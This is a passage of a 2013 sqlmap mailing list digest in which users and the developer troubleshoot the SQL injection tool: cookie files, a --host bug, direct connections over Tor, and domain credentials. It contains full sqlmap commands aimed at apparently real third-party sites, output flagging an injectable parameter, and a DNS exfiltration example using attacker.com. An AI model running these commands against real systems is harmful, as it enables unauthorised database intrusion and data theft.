load-cookies option to direct sqlmap to change >> cookies once in a while (whenever that's gonna be). This is to circumvent >> restrictions one can encounter otherwise.... >> >> Cheers, >> >> Dirk >> >> >> > >> > Kind regards, >> > Miroslav Stampar >> > >> > >> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...>> wrote: >> > >> > >> > >> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: >> > > Nevertheless, with the latest commit that check should be >> "neutralized" now. Could you please retry it now? >> > >> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib >> hiccups, using the same file: >> > >> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib >> bug! >> > Traceback (most recent call last): >> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in >> _really_load >> > assert domain_specified == initial_dot >> > AssertionError >> > >> > _warn_unhandled_exception() >> > [11:13:26] [CRITICAL] there was a problem loading cookies file >> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': >> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') >> > >> > the 999.. looks strange to me. >> > >> > > >> > > >> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < >> mir...@gm... <mailto:mir...@gm...> <mailto: >> mir...@gm... <mailto:mir...@gm...>>> wrote: >> > > >> > > Hi Dirk. >> > > >> > > Well, I would say that you have an expired cookie. Do you see that >> value 0? That value should be a valid UNIX time representing time of cookie >> expiration. Also, I've just tested that cookie of yours and sqlmap says: >> "[WARNING] cookie '....' has expired" >> > > >> > >> > that's true but IMO 0 represents just a session cookie. Example: >> > >> > prompt% wget -q -O /dev/null --keep-session-cookies >> --save-cookies=/dev/stdout bing.com <http://bing.com> >> > # HTTP cookie file. >> > # Generated by Wget on 2013-04-15 11:23:13. >> > # Edit at your own risk. >> > >> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR >> AUTOREDIR=0&GEOVAR=&DOB=20130415 >> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD >> D=2781203&MS=2781203&AF=NOFORM >> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID >> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe >> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID >> 333995A69E06630B2EB491169F016314 >> > .bing.com <http://bing.com> TRUE / FALSE 0 _SS >> SID=B954CB7EDF8643CABAD8013F27A241E7 >> > .bing.com <http://bing.com> TRUE / FALSE 0 _HOP >> > .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1 >> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1 >> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID >> V=2&GUID=975091780DFF407DA9DD07139FD97C4D >> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB >> 333995A69E06630B2EB491169F016314 >> > >> > prompt% >> > >> > Same parser problem btw if I edit the cookie file and put 1429089794 >> unix time instead of 0 in there. >> > >> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies >> but cookies w/ expiration date) and uses the last >> > cookie only for the first 120 tries. >> > >> > Cheers, Dirk >> > >> > >> > > >> > > Kind regards, >> > > Miroslav Stampar >> > > >> > > >> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> >> wrote: >> > > >> > > >> > > Hi Miroslav, >> > > >> > > thx for your prompt answer. >> > > >> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: >> > > > Hi Dirk. >> > > > >> > > > Could you please get the latest revision and retry it again? >> > > ed5599f: almost the same: with cookie in the header sqlmap takes only >> this one. >> > > The slight difference seems to be that in the case where I didn't >> supply a cookie >> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the >> server anymore. >> > > > >> > > > There was a situation where info messages have been wrongly written >> that original response contained Set-Cookie in situations like yours. >> > > > >> > > > In case that everything stays as it is, I'll need to ask you to >> provide more details. For example, cookie file would be great. >> > > >> > > sure, here you go: >> > > >> > > --snip >> > > # Netscape HTTP Cookie File >> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie> >> > > [..] >> > > --snap >> > > >> > > They are all session cookies. For easier reading here I put some >> blanks in the line >> > > above, in "cookie-file" there aren't any though. Cookies were >> generated with >> > > stompy and a shell script (looks he same as with >> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> >> <URL>) >> > > >> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-) >> > > >> > > > >> > > > Also, please make sure that the cookie file contains proper >> cookie(s) - domain name should be the same as a domain of target, cookie >> needs to have a proper valid time, etc. >> > > >> > > see above. >> > > >> > > Cheers, >> > > >> > > Dirk >> > > >> > > > >> > > > >> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>>> wrote: >> > > > >> > > > Hi Miroslav, >> > > > >> > > > yes unfortunately. >> > > > >> > > > If I omit the cookie line in the request header completely, sqlmap >> > > > seems to take the first cookie issued by the server with set-cookie >> (and >> > > > put's it silently in). >> > > > >> > > > Cheers, >> > > > >> > > > Dirk >> > > > >> > > > >> > > > >> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: >> > > > > Hi. >> > > > > >> > > > > And this is also happening if you are skipping "Cookie: >> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? >> > > > > >> > > > > Kind regards, >> > > > > Miroslav Stampar >> > > > > >> > > > > >> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>>>> wrote: >> > > > > >> > > > > >> > > > > Hi folks, >> > > > > >> > > > > .... that doesn't work for me. It always uses the cookie supplied >> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one >> > > > > from the 1st server reply is being used) >> > > > > >> > > > > So what is wrong in here: >> > > > > >> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce >> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ >> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ >> > > > > --level=2 --risk=2 -r $REQUEST >> > > > > >> > > > > The content of the file $REQUEST is: >> > > > > >> > > > > POST <URL> HTTP/1.1 >> > > > > Host: <HOST> >> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) >> AppleWebKit/525.13 (KHTML, like Gecko) >> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> < >> http://0.2.149.6> <http://0.2.149.6> Safari/525.13 >> > > > > Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> > > > > Accept-Language: en-US,en;q=0.5 >> > > > > Accept-Encoding: gzip, deflate >> > > > > Referer: <Referer> >> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 >> > > > > Connection: keep-alive >> > > > > Content-Type: application/x-www-form-urlencoded >> > > > > Content-Length: 67 >> > > > > >> > > > > <abunchofpostparams> >> > > > > >> > > > > >> > > > > No hints that cookie-file is not in correct format (I've been >> through this, >> > > > > at least I think I so ;) ). >> > > > > >> > > > > Any insight would be much appreciated. >> > > > > >> > > > > >> > > > > Cheers, >> > > > > >> > > > > Dirk >> > > > > >> > > > > >> > > > > >> ------------------------------------------------------------------------------ >> > > > > Precog is a next-generation analytics platform capable of advanced >> > > > > analytics on semi-structured data. The platform includes APIs for >> building >> > > > > apps and a phenomenal toolset for data science. Developers can use >> > > > > our toolset for easy data analysis & visualization. Get a free >> account! >> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter >> > > > > _______________________________________________ >> > > > > sqlmap-users mailing list >> > > > > sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>> <mailto: >> sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>>> <mailto: >> sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>> <mailto: >> sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>>>> >> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > >> > > > > >> > > > > >> > > > > >> > > > > -- >> > > > > Miroslav Stampar >> > > > > http://about.me/stamparm >> > > > >> > > > >> > > > >> > > > >> > > > -- >> > > > Miroslav Stampar >> > > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > >> > >> > >> > >> > -- >> > Miroslav Stampar >> > http://about.me/stamparm >> >> >> >> >> ------------------------------ >> >> Message: 6 >> Date: Mon, 15 Apr 2013 14:01:01 -0700 >> From: <co...@5i...> >> Subject: [sqlmap-users] --host parameter >> To: sql...@li... >> Message-ID: >> < >> 201...@em... >> > >> >> Content-Type: text/plain; charset="utf-8" >> >> Hello, >> the --host doesn't work as expected, or I am doing something wrong: >> >> >> this works as expected: >> >> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >> >> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> takeover tool >> http://sqlmap.org >> >> [!] legal disclaimer: Usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility to >> obey all applicable local, state and federal laws. Developers assume no >> liability and are not responsible for any misuse or damage caused by >> this program >> >> [*] starting at 23:57:15 >> >> [23:57:15] [INFO] testing connection to the target URL >> [23:57:15] [INFO] heuristics detected web page charset 'ascii' >> [23:57:15] [INFO] testing if the target URL is stable. This can take a >> couple of seconds >> [23:57:16] [INFO] target URL is stable >> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >> [23:57:16] [INFO] GET parameter 'id' is dynamic >> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >> might be injectable (possible DBMS: 'MySQL') >> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >> >> >> .... >> >> >> this doesn't work as expected: >> >> ./sqlmap.py --host='i.csland.ro' >> --url='http://188.240.236.15/index.php?id=0' >> >> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> takeover tool >> http://sqlmap.org >> >> [!] legal disclaimer: Usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility to >> obey all applicable local, state and federal laws. Developers assume no >> liability and are not responsible for any misuse or damage caused by >> this program >> >> [*] starting at 23:58:03 >> >> [23:58:03] [INFO] testing connection to the target URL >> [23:58:03] [CRITICAL] page not found (404) >> it is not recommended to continue in this kind of cases. Do you want to >> quit and make sure that everything is set up properly? [Y/n] >> [23:58:05] [WARNING] HTTP error codes detected during run: >> >> ............ >> >> >> Of course i.csland.ro resolves to 188.240.236.15. Any idea? >> >> Thanks. >> >> >> >> >> ------------------------------ >> >> Message: 7 >> Date: Tue, 16 Apr 2013 09:12:05 +1100 >> From: ???????? ?????? <vo...@s2...> >> Subject: [sqlmap-users] Sqlmap and direct connect error >> To: sql...@li... >> Message-ID: <C59...@s2...> >> Content-Type: text/plain; charset=us-ascii >> >> Hi! >> >> This bug detected if add direct param. >> >> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> >> >> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry your run with the latest development version from the GitHub >> repository. If the exception persists, please send by e-mail to ' >> sql...@li...' or open a new issue at ' >> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> text and any information required to reproduce the bug. The developers will >> try to reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 1.0-dev-de99717 >> Python version: 2.7.3 >> Operating system: posix >> Command line: sqlmap.py -d >> **************************************************** -u >> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> Technique: None >> Back-end DBMS: MySQL (identified) >> Traceback (most recent call last): >> File "sqlmap.py", line 87, in main >> start() >> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> start >> action() >> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> setHandler() >> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> setHandler >> conf.dbmsConnector.connect() >> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> connect >> self.connector = pymysql.connect(host=self.hostname, user=self.user, >> passwd=self.password, db=self.db, port=self.port, >> connect_timeout=conf.timeout, use_unicode=True) >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> line 93, in Connect >> return Connection(*args, **kwargs) >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 584, in __init__ >> self._connect() >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 739, in _connect >> sock.connect((self.host, self.port)) >> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> connect >> raise GeneralProxyError((5, _generalerrors[5])) >> GeneralProxyError: (5, 'bad input') >> >> >> >> >> ------------------------------ >> >> Message: 8 >> Date: Tue, 16 Apr 2013 14:19:18 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] --host parameter >> To: co...@5i... >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Hi. >> >> Thank you for your report and find it fixed with the latest commit [1]. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 >> >> >> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: >> >> > Hello, >> > the --host doesn't work as expected, or I am doing something wrong: >> > >> > >> > this works as expected: >> > >> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:57:15 >> > >> > [23:57:15] [INFO] testing connection to the target URL >> > [23:57:15] [INFO] heuristics detected web page charset 'ascii' >> > [23:57:15] [INFO] testing if the target URL is stable. This can take a >> > couple of seconds >> > [23:57:16] [INFO] target URL is stable >> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >> > [23:57:16] [INFO] GET parameter 'id' is dynamic >> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >> > might be injectable (possible DBMS: 'MySQL') >> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >> > >> > >> > .... >> > >> > >> > this doesn't work as expected: >> > >> > ./sqlmap.py --host='i.csland.ro' >> > --url='http://188.240.236.15/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:58:03 >> > >> > [23:58:03] [INFO] testing connection to the target URL >> > [23:58:03] [CRITICAL] page not found (404) >> > it is not recommended to continue in this kind of cases. Do you want to >> > quit and make sure that everything is set up properly? [Y/n] >> > [23:58:05] [WARNING] HTTP error codes detected during run: >> > >> > ............ >> > >> > >> > Of course i.csland.ro resolves to 188.240.236.15. Any idea? >> > >> > Thanks. >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! >> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 9 >> Date: Tue, 16 Apr 2013 14:33:33 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] Sqlmap and direct connect error >> To: ???????? ?????? <vo...@s2...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> >> Content-Type: text/plain; charset="koi8-r" >> >> Hi Vladimir. >> >> Find it "patched" with the latest commit [1]. Basically, those >> combinations >> should not be allowed (-d and --url; -d and --tor; etc.) and now we've >> added new option validation checks for this kind of cases. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a >> >> >> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: >> >> > Hi! >> > >> > This bug detected if add direct param. >> > >> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > >> > >> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry >> > your run with the latest development version from the GitHub >> repository. If >> > the exception persists, please send by e-mail to ' >> > sql...@li...' or open a new issue at ' >> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> > text and any information required to reproduce the bug. The developers >> will >> > try to reproduce the bug, fix it accordingly and get back to you. >> > sqlmap version: 1.0-dev-de99717 >> > Python version: 2.7.3 >> > Operating system: posix >> > Command line: sqlmap.py -d >> > **************************************************** -u >> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > Technique: None >> > Back-end DBMS: MySQL (identified) >> > Traceback (most recent call last): >> > File "sqlmap.py", line 87, in main >> > start() >> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> > start >> > action() >> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> > setHandler() >> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> > setHandler >> > conf.dbmsConnector.connect() >> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> > connect >> > self.connector = pymysql.connect(host=self.hostname, user=self.user, >> > passwd=self.password, db=self.db, port=self.port, >> > connect_timeout=conf.timeout, use_unicode=True) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> > line 93, in Connect >> > return Connection(*args, **kwargs) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 584, in __init__ >> > self._connect() >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 739, in _connect >> > sock.connect((self.host, self.port)) >> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> > connect >> > raise GeneralProxyError((5, _generalerrors[5])) >> > GeneralProxyError: (5, 'bad input') >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! >> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 10 >> Date: Tue, 16 Apr 2013 23:26:39 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: offline mode for >> --dns-domain? >> To: SqlMap List <sql...@li...> >> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 >> >> Hi, >> >> in cases where sqlmap is run against targets on internal networks it >> would be great if one could tell sqlmap to simply proceed without >> expecting incoming DNS requests, because sqlmap can not be executed >> directly on the DNS server (which can't reach the target, but the >> target can reach the DNS server). >> >> For me it would be enough to simply run something like >> - -u ... --dns-domain=attacker.com --dns-port=0 >> (--dns-port does not exist [yet]) >> >> to let sqlmap know that it doesn't need to start a DNS listener. >> >> I would then collect and decode the DNS querries on the DNS server >> manually, but I could also envision running a second sqlmap instance >> on the DNS server with --dns-domain (but without -u) doing that job. >> >> -----BEGIN PGP SIGNATURE----- >> >> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p >> dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf >> WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz >> cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU >> uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos >> D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C >> JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN >> QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx >> J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O >> yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF >> plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz >> N5xHRCVPLLSrPfTPiyIJ >> =JSkD >> -----END PGP SIGNATURE----- >> >> >> >> ------------------------------ >> >> Message: 11 >> Date: Tue, 16 Apr 2013 23:24:23 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: --dns-domain for non-root >> users (--dns-port) >> To: sql...@li... >> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 >> >> Hi, >> >> I just wanted to request a "extension" for a previous feature request >> (DNS exfiltration [1]) but after looking at my former feature request >> I realized that it included already the feature I was about to request: >> >> - --dns-domain for non-root users: >> - --dns-port >> >> The use-case is mentioned in the former feature request: >> >> [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100 >> -----BEGIN PGP SIGNATURE----- >> >> iQIcBAEBCgAGBQJRbcGHAAoJEJeRHQyF0ukM58gP/1o1qTQTI9bzk3Ez+2wcqign >> F0BlB//+rB6CzBPsEvkRioefbJPIcbX9Kcq+IqDygtk8/ux9uR3s1nKyps6nmvY6 >> EXi4EY0e8uMPc2oXGkMVie1UOYvKiW7apnEEOoIgymLpx/UiXhu3fcjkVymIem7w >> obHpd1pu+oIdXyt006yQDZzr9LRT1j/7mXF4fQ0kwrNJuRx+x/LUpRIoHrmn+JOC >> VWn29ayUaK7+si1xilibMaOuUPk6Q/4mURoptXJ0DfPbXkk9z7+Zwz8ga30I8xZB >> qpJtVpK/jxZAR8Bhc+SbKMNGSWDUlf8dweohRVFEYd6Bl0xZU4vbOF2WB9+z/0Go >> kK7850lyldD+a1G/ilqr1IpyoV3Pxx11D0Kwg8ARoKUKosqjh02rgJQ/GLTJjgJj >> QZmaDvVcV2NCeUKEJInR4BRVZDWqBVmA44ltfuswOEpz7pLo6oiz/3ZXyg0ad2m7 >> 775afpHgFslt2NsjVz1aU+B531Iglwx/8uuLkwtP30lWscp6Ng3GkB4MM+U7yM8d >> tSXDlHmVxsJbBxX9rFy5KyRSrdyoQwdwqKyCmBpke/MyLz/NnLMolQUsk239Ljv+ >> ztA2EcK44MGuA5Rnr5uSmBoM6ZCB950JAjw2irvDBqpjfgD/T+lvc1MLcVykNu45 >> W8t1vxN9utvoag/kIeKJ >> =UXOD >> -----END PGP SIGNATURE----- >> >> >> >> ------------------------------ >> >> Message: 12 >> Date: Tue, 16 Apr 2013 20:52:26 -0500 >> From: Brian Milliron <Br...@EC...> >> Subject: [sqlmap-users] Domain credentials >> To: sql...@li... >> Message-ID: <516...@EC...> >> Content-Type: text/plain; charset=ISO-8859-1; format=flowed >> >> What is the correct format to make a direct connection to a database >> using windows domain credentials? >> I have tried >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" --auth-type NTLM >> ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB" >> >> I get this error "[CRITICAL] DB-Lib error message 20017, severity 9: >> Unexpected EOF from the server >> Net-Lib error during Operation now in progress Error 115 - Operation now >> in progressDB-Lib error message 20002, severity 9: >> Adaptive Server connection failed" >> >> >> >> ------------------------------ >> >> Message:... [truncated message content] |
